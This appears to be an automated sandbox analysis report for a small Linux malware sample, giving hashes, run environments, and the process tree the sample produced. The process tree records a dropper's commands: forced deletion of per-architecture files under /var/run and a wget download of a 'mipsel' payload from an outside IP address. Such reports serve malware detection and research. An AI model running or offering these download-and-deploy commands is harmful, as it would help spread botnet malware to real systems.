Analysis
-
max time kernel
30632s -
max time network
154s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-11-2022 09:49
Static task
static1
Behavioral task
behavioral1
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-mipsbe-20221111-en
Behavioral task
behavioral4
Sample
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Resource
debian9-mipsel-en-20211208
General
-
Target
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
-
Size
1005B
-
MD5
11496369b067c3c4f8db7e61546dcf6d
-
SHA1
baf395ac8359c4a92e634fad39d8f0c549f02b75
-
SHA256
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
-
SHA512
61172c41174bac18d4023e917ec097c4f901909dcdd32c5888cffa114ce12c22ac4e42c042f45e059cc65dd2721d7393633d6867a4e007c6ca7a82cbd5299fb0
Malware Config
Signatures
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8description ioc process /tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8 /tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8 03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Processes
-
/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e81⤵
- Writes file to tmp directory
-
/bin/rmrm -fr /var/run/mipsel rm -fr /var/run/mips rm -fr /var/run/arm rm -fr /var/run/ppc rm -fr /var/run/powerpc rm -fr /var/run/sh4 rm -fr /var/run/sh rm -fr /var/run/murda rm -fr /var/run/x86_64 rm -fr /var/run/superh2⤵
-
/usr/bin/wgetwget -c http://198.27.124.29/mipsel -P /var/run2⤵